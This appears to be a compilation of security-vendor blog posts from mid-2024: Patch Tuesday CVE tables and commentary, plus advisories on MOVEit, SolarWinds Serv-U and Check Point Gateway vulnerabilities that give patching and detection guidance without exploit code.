CVE-2024-37318 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37332 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37331 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-35271 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-35272 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-20701 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21303 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21308 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21317 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21331 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21425 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37319 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37320 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37321 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37322 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37323 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37324 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-21449 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37326 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37327 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37328 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37329 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37330 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37333 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37336 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-28928 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-35256 SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability No No 8.8
CVE-2024-37334 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability No No 8.8

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38089 Microsoft Defender for IoT Elevation of Privilege Vulnerability No No 9.1

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38076 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability No No 9.8
CVE-2024-21417 Windows Text Services Framework Elevation of Privilege Vulnerability No No 8.8
CVE-2024-30013 Windows MultiPoint Services Remote Code Execution Vulnerability No No 8.8
CVE-2024-37981 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37977 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-37978 Secure Boot Security Feature Bypass Vulnerability No No 8
CVE-2024-38062 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38080 Windows Hyper-V Elevation of Privilege Vulnerability Yes No 7.8
CVE-2024-38100 Windows File Explorer Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38059 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38043 PowerShell Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38047 PowerShell Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38517 Github: CVE-2024-38517 TenCent RapidJSON Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38078 Xbox Wireless Adapter Remote Code Execution Vulnerability No No 7.5
CVE-2024-38072 Windows Remote Desktop Licensing Service Denial of Service Vulnerability No No 7.5
CVE-2024-38032 Microsoft Xbox Remote Code Execution Vulnerability No No 7.1
CVE-2024-38069 Windows Enroll Engine Security Feature Bypass Vulnerability No No 7
CVE-2024-26184 Secure Boot Security Feature Bypass Vulnerability No No 6.8
CVE-2024-37985 Arm: CVE-2024-37985 Systematic Identification and Characterization of Proprietary Prefetchers No Yes 5.9
CVE-2024-38041 Windows Kernel Information Disclosure Vulnerability No No 5.5

Authentication Bypasses in MOVEit Transfer and MOVEit Gateway

On June 25, 2024, Progress Software published information on two new vulnerabilities in MOVEit Transfer and MOVEit Gateway: CVE-2024-5806, a high-severity authentication bypass affecting the MOVEit Transfer SFTP service in a default configuration, and CVE-2024-5805, a critical SFTP-associated authentication bypass vulnerability affecting MOVEit Gateway. Attackers can exploit these improper authentication vulnerabilities to bypass SFTP authentication and gain access to MOVEit Transfer and Gateway.

CVE-2024-5806 is an improper authentication vulnerability affecting the MOVEit Transfer SFTP service that can lead to authentication bypass. Rapid7 researchers tested a MOVEit Transfer 2023.0.1 instance, which appeared to be vulnerable in the default configuration. As of June 25, the known criteria for exploitation are threefold: that attackers have knowledge of an existing username, that the target account can authenticate remotely, and that the SFTP service is exposed. It’s possible that attackers may spray usernames to identify valid accounts. Rapid7 recommends installing the vendor-provided patches for CVE-2024-5806 on an emergency basis, without waiting for a regular patch cycle to occur.

According to Progress Software’s advisory, CVE-2024-5805 is a critical authentication bypass vulnerability that affects the SFTP feature of the MOVEit Gateway software in version 2024.0.0; earlier versions do not appear to be vulnerable, which likely limits available attack surface area. MOVEit Gateway is an optional component designed to proxy traffic to and from MOVEit Transfer instances. A patch is available for CVE-2024-5805 and should be applied on an emergency basis for organizations running MOVEit Gateway.

Progress MOVEit is an enterprise file transfer suite, which inherently makes it a highly desirable target for threat actors. Since enterprise file transfer software typically holds a large volume of confidential data, smash-and-grab attackers target these solutions to extort victims. In June 2023, an unauthenticated attack chain targeting MOVEit Transfer was widely exploited by the Cl0p ransomware group. Shodan queries indicate that there are approximately 1,000 public-facing MOVEit Transfer SFTP servers and approximately 70 public-facing MOVEit Gateway SFTP servers. (Note that not all of these may be vulnerable to these latest CVEs.)

Notably, Rapid7 observed that installers for the patched (latest) version of the MOVEit Transfer have been available on VirusTotal since at least June 11, 2024. Vulnerability details and proof-of-concept exploit code are publicly available for MOVEit Transfer CVE-2024-5806 as of June 25, 2024.

Mitigation guidance

MOVEit customers should apply vendor-provided updates for both vulnerabilities immediately.

The following versions of MOVEit Transfer are vulnerable to CVE-2024-5806:

The advisory notes that “Customers using the MOVEit Cloud environment were patched and are no longer vulnerable to this exploit.”

Only MOVEit Gateway 2024.0.0 is vulnerable to CVE-2024-5805, per the vendor advisory. The vulnerability is fixed in MOVEit Gateway 2024.0.1. The advisory indicates that “MOVEit Cloud does not use MOVEit Gateway, so no further action is needed by MOVEit Cloud customers.”

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-5805 and CVE-2024-5806 with authenticated vulnerability checks expected to be available in today’s (June 25) content release.

Patch Tuesday - June 2024

It’s June 2024 Patch Tuesday. Microsoft is addressing 51 vulnerabilities today, and has evidence of public disclosure for just a single one of those. At time of writing, none of the vulnerabilities published today are listed on CISA KEV, although this is always subject to change. Microsoft is patching a single critical remote code execution (RCE) vulnerability today. Seven browser vulnerabilities were published separately this month, and are not included in the total.

MSMQ: critical RCE

The sole critical RCE patched today is CVE-2024-30080 for all current versions of Windows. Exploitation requires that an attacker send a specially crafted malicious packet to an MSMQ server, which Patch Tuesday watchers will know as a perennial source of vulnerabilities. As usual, Microsoft points out that the Windows message queuing service is not enabled by default; as usual, Rapid7 notes that a number of applications – including Microsoft Exchange – quietly introduce MSMQ as part of their own installation routine. As is typical of MSMQ RCE vulnerabilities, CVE-2024-30080 receives a high CVSSv3 base score due to the network attack vector, low attack complexity, and lack of required privileges. Code execution is presumably in a SYSTEM context, although the advisory does not specify.

Office: malicious file RCEs

Microsoft Office receives patches for a pair of RCE-via-malicious-file vulnerabilities. CVE-2024-30101 is a vulnerability in Outlook; although the Preview Pane is a vector, the user must subsequently perform unspecified specific actions to trigger the vulnerability and the attacker must win a race condition. On the other hand, CVE-2024-30104 does not have the Preview Pane as a vector, but nevertheless ends up with a slightly higher CVSS base score of 7.8, since exploitation relies solely on the user opening a malicious file.

SharePoint: RCE

This month also brings a patch for SharePoint RCE CVE-2024-30100. The advisory is sparing on details, and the context of code exploitation is not clear. The weakness is described as CWE-426: Untrusted Search Path; many (but not all) vulnerabilities associated with CWE-426 lead to elevation of privilege.

DNSSEC NSEC3: CPU exhaustion DoS

And now for something completely different: ​​CVE-2023-50868, which describes a denial of service vulnerability in DNSSEC. This vulnerability is present in the DNSSEC spec itself, and the CVE was assigned by MITRE on behalf of DNSSEC. Microsoft’s implementation of DNSSEC is thus subject to the same attack as other implementations. An attacker can exhaust CPU resources on a DNSSEC-validating DNS resolver by demanding responses from a DNSSEC-signed zone, if the resolver uses NSEC3 to respond to the request. NSEC3 is designed to provide a safe way for a DNSSEC-validating DNS resolver to indicate that a requested resource does not exist. Under certain circumstances, the DNS resolver must perform thousands of iterations of a hash function to calculate an NSEC3 response, and this is the foundation on which this DoS exploit rests. All current versions of Windows Server receive a patch today.

Typically, when Microsoft publishes a security advisory and describes the vulnerability as publicly disclosed, that public disclosure will have been recent. However, in the case of CVE-2023-50868, the flaw in DNSSEC was first publicly disclosed on 2024-02-13. The advisory acknowledges four academics from the German National Research Centre for Applied Cybersecurity (ATHENE), which is perhaps of interest since these same researchers are authors on a March 2024 academic paper that downplays the DoS potential of CVE-2024-50868. Those same researchers published another DNSSEC flaw CVE-2023-50387 (also known as KeyTrap) in January 2024, which they describe as having potentially serious implications; Microsoft patched that one at the next scheduled opportunity in February. The CVE-2023-50868 advisory published today does not provide further insight as to why this vulnerability wasn’t patched sooner; a reasonable assumption might be that Microsoft assesses CVE-2023-50868 as less urgent/critical than CVE-2023-50387, although both receive a rating of Important on Microsoft’s proprietary severity ranking scale. It’s also possible that Microsoft does not wish to be the only major server OS vendor without a patch.

Lifecycle update

There are no significant changes to the lifecycle phase of Microsoft products this month. In July, Microsoft SQL Server 2014 will move past the end of extended support. From August onwards, Microsoft only guarantees to provide SQL Server 2014 security updates to customers who choose to participate in the paid Extended Security Updates program.

Summary Charts

Patch Tuesday - June 2024
Patch Tuesday - June 2024
What goes up must come down and/or is an attacker's privilege level.
Patch Tuesday - June 2024
No spoofing. No security feature bypass. Plenty of elevation of privilege though.

Summary Tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-37325 Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability No No 8.1
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability No No 7.5
CVE-2024-35254 Azure Monitor Agent Elevation of Privilege Vulnerability No No 7.1
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability No No 5.5
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability No No 4.4

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-5499 Chromium: CVE-2024-5499 Out of bounds write in Streams API No No N/A
CVE-2024-5498 Chromium: CVE-2024-5498 Use after free in Presentation API No No N/A
CVE-2024-5497 Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs No No N/A
CVE-2024-5496 Chromium: CVE-2024-5496 Use after free in Media Session No No N/A
CVE-2024-5495 Chromium: CVE-2024-5495 Use after free in Dawn No No N/A
CVE-2024-5494 Chromium: CVE-2024-5494 Use after free in Dawn No No N/A
CVE-2024-5493 Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-29187 GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM No No 7.3
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability No No 6.7
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability No No 4.7

ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability No No 8
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability No No 8

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability No No 8.8
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability No No 7.3
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability No No 5.7

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability No No 8.8
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.8
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability No No 7.5
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability No No 7.3

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability No No 8.8
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability No No 8.8
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability No No 8.8
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability No No 7.8
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability No No 7
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability No No 6.8
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability No No 5.5
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability No No 4.7

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability No No 9.8
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability No No 8.8
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability No No 8
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability No No 7.8
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 7.8
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 7.8
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2023-50868 MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU No Yes 7.5
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability No No 7.3
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability No No 7
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability No No 6.7
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability No No 5.5
CVE-2024-30067 Winlogon Elevation of Privilege Vulnerability No No 5.5
CVE-2024-30065 Windows Themes Denial of Service Vulnerability No No 5.5
CVE-2024-28995: Trivially Exploitable Information Disclosure Vulnerability in SolarWinds Serv-U

On June 5, 2024, SolarWinds disclosed CVE-2024-28995, a high-severity directory traversal vulnerability affecting their Serv-U file transfer server, which comes in two editions (Serv-U FTP and Serv-U MFT). Successful exploitation of the vulnerability allows unauthenticated attackers to read sensitive files on the target server. Rapid7’s vulnerability research team has reproduced the vulnerability and confirmed that it’s trivially exploitable and allows an external unauthenticated attacker to read any file on disk, including binary files, so long as they know the path and the file is not locked (i.e., opened exclusively by something else).

CVE-2024-28995 is not known to be exploited in the wild as of 9 AM ET on June 11. We expect this to change; Rapid7 recommends installing the vendor-provided hotfix (Serv-U 15.4.2 HF 2) immediately, without waiting for a regular patch cycle to occur.

High-severity information disclosure issues like CVE-2024-28995 can be used in smash-and-grab attacks where adversaries gain access to and attempt to quickly exfiltrate data from file transfer solutions with the goal of extorting victims. File transfer products have been targeted by a wide range of adversaries the past several years, including ransomware groups.

Internet exposure estimates for SolarWinds Serv-U vary substantially based on the query used. For example (note that exposed does not automatically mean vulnerable):

Mitigation guidance

SolarWinds Serv-U 15.4.2 HF 1 and previous versions are vulnerable to CVE-2024-28995, per the vendor advisory. The vulnerability is fixed in SolarWinds Serv-U 15.4.2 HF 2. SolarWinds Serv-U customers should apply the vendor-provided hotfix immediately.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2024-28995 with an unauthenticated vulnerability check available as of the Monday, June 10 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and may alert on post-exploitation behavior related to this vulnerability:

  • Suspicious Web Server Request - Successful Path Traversal Attack
The Dreaded Network Pivot: An Attack Intelligence Story

Rapid7 recently released our 2024 Attack Intelligence Report, a 14-month deep dive into the vulnerability and attacker landscape. The spiritual successor to our annual Vulnerability Intelligence Report, the AIR includes data from the Rapid7 research team combined with our detection and response and threat intelligence teams. It is designed to provide the clearest view yet into what security professionals face day to day.

In this blog, we would like to focus on one area of research the AIR highlights: network edge technologies. In 2023 (and early 2024) Rapid7 found some startling information about the vulnerability of these critical devices. Essentially, of the mass compromise events we studied, exploitation of network edge tech increased significantly over the 14 months the report covers — something we will cover in detail shortly.

But first, some background. Way back in 2020, Rapid7 created a new attacker utility category for vulnerabilities that functioned as network pivots. These are vulnerabilities that give external attackers internal network access. Think VPNs, firewalls, security gateways, etc. They serve an important function in any network but visibility into these devices can be challenging, making them prime targets for attackers.

In 2023 we saw a surge in attacks on these network appliances. Mass compromise events stemming from exploitation of network edge tech nearly doubled over the period studied — with 36% of all widely exploited vulnerabilities occurring within network perimeter technology. Looking back over the previous reports, we determined some 60% of all of the vulnerabilities Rapid7 analyzed in network edge devices over a three year period were exploited as zero-days, a disproportionate number when looking at the entirety of the vulnerabilities studied.

Over the four years Rapid7 has been categorizing this type of vulnerability, network edge devices have comprised 24% of exploited vulnerabilities and a quarter of all widespread threats.

The Dreaded Network Pivot: An Attack Intelligence Story

State-sponsored groups and ransomware groups like Cl0p, Inc, Bl00dy, Akira, Play, LockBit, and more went after network edge tech in 2023. Network edge devices are essential for modern network operations, but they also represent a major weak spot in cybersecurity defenses — one that these organized groups took advantage of in 2023.

There are a number of reasons for this. It can be difficult to detect intrusions on these types of devices as the capabilities for logging and threat detection vary depending on the specific devices used. Some do not log key events, they use a variety of firmware and (often proprietary) operating systems, and in some cases the firmware itself may be encrypted or obfuscated. This makes monitoring and detecting intrusions troublesome across different devices and developing a strategy for the entire spectrum of devices complex.

For more information about network edge technology vulnerabilities, as well as the latest data on ransomware, attacker utilities, widespread threats, file transfer vulns, and more, download the 2024 Attack Intelligence Report.

CVE-2024-24919: Check Point Security Gateway Information Disclosure

On May 28, 2024, Check Point published an advisory for CVE-2024-24919, a high-severity information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade.

On May 29, 2024, security firm mnemonic published a blog reporting that they have observed in-the-wild exploitation of CVE-2024-24919 since April 30, 2024, with threat actors leveraging the vulnerability to enumerate and extract password hashes for all local accounts, including accounts used to connect to Active Directory. They’ve also observed adversaries moving laterally and extracting the “ntds.dit” file from compromised customers' Active Directory servers, within hours of an initial attack against a vulnerable Check Point Gateway.

On May 30, 2024, watchTowr published technical details of CVE-2024-24919 including a PoC.

The vulnerability allows an unauthenticated remote attacker to read the contents of an arbitrary file located on the affected appliance. For example, this allows an attacker to read the appliances /etc/shadow file, disclosing the password hashes for local accounts. The attacker is not limited to reading this file and may read other files that contain sensitive information. An attacker may be able to crack the password hashes for these local accounts, and if the Security Gateway allows password only authentication, the attacker may use the cracked passwords to authenticate.

Mitigation Guidance

According to the vendor advisory, the following products are vulnerable to CVE-2024-24919:

  • CloudGuard Network
  • Quantum Maestro
  • Quantum Scalable Chassis
  • Quantum Security Gateways
  • Quantum Spark Appliances

Check Point has advised that a Security Gateway is vulnerable if one of the following configuration is applied:

  • If the “IPSec VPN” blade has been enabled and the Security Gateway device is part of the “Remote Access” VPN community.
  • If the “Mobile Access” blade has been enabled.

Check Point has released hotfixes for Quantum Security Gateway, Quantum Maestro, Quantum Scalable Chassis, and Quantum Spark Appliances. We advise customers to refer to the Check Point advisory for the most current information on affected versions and hotfixes.

The vendor supplied hotfixes should be applied immediately. Rapid7 strongly recommends that Check Point Security Gateway customers examine their environments for signs of compromise and reset local account credentials in addition to applying vendor-provided fixes.

Check Point notes that exploit attempts their team has observed “focus on remote access scenarios with old local accounts with unrecommended password-only authentication.” The company recommends that customers check for local account usage, disable any unused local accounts, and add certificate-based authentication rather than password-only authentication. More information and recommendations on user and client authentication for remote access is available here.

Rapid7 Customers

A vulnerability check is in development for InsightVM and Nexpose customers to assess exposure to CVE-2024-24919. This blog will be updated with the latest information as and when it is available

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on post-exploitation behavior related to this vulnerability:

  • Suspicious Web Server Request - Successful Path Traversal Attack
  • Suspicious Web Request - Possible Check Point VPN (CVE-2024-24919) Exploitation